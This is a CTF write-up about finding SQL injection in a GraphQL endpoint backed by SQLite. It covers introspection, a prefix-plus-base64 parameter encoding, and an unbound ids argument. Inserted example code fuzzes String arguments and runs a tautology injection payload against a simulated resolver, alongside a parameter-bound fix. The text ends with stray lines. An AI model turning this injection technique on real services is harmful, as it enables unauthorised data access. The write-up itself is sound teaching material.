Challenge:
No description.
http://47.74.147.34:20011
Well, another site :D. After browsing around, I checked the Burp history and something interesting appeared:
I had seen this type of query before; the site is clearly using GraphQL to perform the query.
After dumping the whole __schema of the GraphQL endpoint without seeing anything suspicious or any authorization vulnerability, I started thinking the website would be vulnerable in the backend database.
Testing NoSQL injection: no luck. Time to fuzz!
Wow, a SQLite error. It happened because we passed a malformed object to the query; a little skill tells you that "aYT0x" stands for "a" + atob("YT0x") = "a" + "a=1", i.e. a one-letter prefix followed by the base64-encoded value.
Interesting!
So now we know what to inject, but looking at the input points, they all use SQLite bound parameters, so we can't do anything there.
Dumping the schema, notice this (thanks to my respectable bro):
{"name":"itemSelection","description":"List details for BlogItems in comma separated list of ID's","args":[{"name":"ids","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"type":{"kind":"LIST","name":null,"ofType"…….blah….blah……
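Spotting the one free-text argument in a large introspection dump is the step the writeup credits to a friend; it can be done mechanically. The following is an added example, not part of the original post: it posts a standard introspection query (shown as the INTROSPECTION_QUERY constant), and for a constructed, trimmed schema in the same shape as the dump above it lists every field argument whose underlying scalar is String. The sample schema, the item field and the BlogItem type are assumptions made up for the example; only itemSelection(ids: String!) comes from the writeup.

```python
import json

# Introspection query you would POST to the GraphQL endpoint to get the dump
# the writeup pastes from (selecting args and their (wrapped) types).
INTROSPECTION_QUERY = (
    "{ __schema { types { name kind fields { name description "
    "args { name type { kind name ofType { kind name ofType { kind name } } } } } } } }"
)

# Constructed sample in the shape of the real dump. The `item` field and the
# BlogItem type are assumptions for this example; itemSelection(ids: String!)
# is the field quoted in the writeup.
SAMPLE_SCHEMA = {
    "__schema": {"types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "item", "description": "A single BlogItem",
             "args": [{"name": "id", "type": {"kind": "NON_NULL", "name": None,
                       "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}}]},
            {"name": "itemSelection",
             "description": "List details for BlogItems in comma separated list of ID's",
             "args": [{"name": "ids", "type": {"kind": "NON_NULL", "name": None,
                       "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}}]},
        ]},
        {"name": "BlogItem", "kind": "OBJECT", "fields": [
            {"name": "title", "args": [],
             "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        ]},
    ]}
}


def unwrap(type_ref):
    """Strip NON_NULL / LIST wrappers and return the named type underneath."""
    while type_ref.get("ofType"):
        type_ref = type_ref["ofType"]
    return type_ref.get("name")


def string_args(schema):
    """(type, field, arg) for every argument whose scalar is String.

    String arguments are the free-text inputs; they are the first candidates
    for fuzzing because anything goes in, including 'a=1' or SQL fragments.
    """
    hits = []
    for typ in schema["__schema"]["types"]:
        for field in typ.get("fields") or []:
            for arg in field.get("args") or []:
                if unwrap(arg["type"]) == "String":
                    hits.append((typ["name"], field["name"], arg["name"]))
    return hits


if __name__ == "__main__":
    print(json.dumps({"query": INTROSPECTION_QUERY}))
    for typ, field, arg in string_args(SAMPLE_SCHEMA):
        print("free-text argument: %s.%s(%s: String)" % (typ, field, arg))
```

On a real dump, feed `json.load()` of the HTTP response to `string_args` in place of SAMPLE_SCHEMA; every hit is an argument to try the prefix+base64 probe against.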
So we know we can construct a new query based on this:
query={ itemSelection(ids:"bYT0x") { title } }
Luckily, this input point takes no precautions against SQLite injection (the ids string is not bound as a parameter), so we try to inject:
😀
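To tie together the parameter encoding worked out from the SQLite error ("a" + base64("a=1") = "aYT0x") and the unbound itemSelection(ids:) argument, here is an added example that is not part of the original writeup. It models the backend with an in-memory SQLite table and two hypothetical resolvers: one that splices the decoded comma-separated ids straight into the SQL (the behaviour the writeup observed), and a hardened one that validates each id and binds it with `?` placeholders (the behaviour of the other, un-injectable input points). The table name, columns, rows and the tautology payload are assumptions for the example; the writeup's own injection is not shown on the page.

```python
import base64
import sqlite3

# Constructed sample data standing in for the challenge's BlogItems table;
# the real table layout is not shown in the writeup, so these are assumptions.
SAMPLE_ROWS = [
    (1, "Hello world", 1),
    (2, "Second post", 1),
    (3, "Draft: not public", 0),
]


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE blog_items (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    conn.executemany("INSERT INTO blog_items VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def decode_param(value):
    """Undo the site's scheme: one prefix letter, then base64 ('aYT0x' -> 'a=1')."""
    return base64.b64decode(value[1:]).decode()


def encode_param(prefix, raw):
    """Inverse of decode_param, used to build a value the backend will accept."""
    return prefix + base64.b64encode(raw.encode()).decode()


def build_query(ids_arg):
    """JSON body for the itemSelection field from the dumped schema."""
    return {"query": '{ itemSelection(ids:"%s") { title } }' % ids_arg}


def item_selection_vulnerable(conn, ids_arg):
    """Hypothetical resolver: the decoded comma-separated ids are spliced into SQL."""
    ids = decode_param(ids_arg)
    sql = "SELECT title FROM blog_items WHERE published = 1 AND id IN (%s)" % ids
    return [row[0] for row in conn.execute(sql)]


def item_selection_safe(conn, ids_arg):
    """Hardened resolver: each id must parse as an int and is bound with '?'."""
    ids = [int(x) for x in decode_param(ids_arg).split(",")]
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT title FROM blog_items WHERE published = 1 AND id IN (%s)" % placeholders
    return [row[0] for row in conn.execute(sql, ids)]


def run_probe(resolver, conn, ids_arg):
    """Call a resolver and return its rows, or the name of the exception it raised."""
    try:
        return resolver(conn, ids_arg)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    print(decode_param("aYT0x"))                          # a=1
    print(build_query("bYT0x"))
    # The "a=1" probe from the writeup: splicing it in trips a SQLite error.
    print(run_probe(item_selection_vulnerable, db, "bYT0x"))
    # A generic tautology (an assumption, not the writeup's payload) escapes the
    # IN (...) list and drags in the unpublished row; the bound version rejects it.
    payload = encode_param("b", "1) OR 1=1 --")
    print(run_probe(item_selection_vulnerable, db, payload))
    print(run_probe(item_selection_safe, db, payload))
```

The contrast is the whole point of the writeup's observation: with `?` binding the ids never reach the SQL parser as syntax, so the same decoded string that breaks the spliced resolver is simply rejected as a non-integer by the bound one.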
Welaimkale
sup?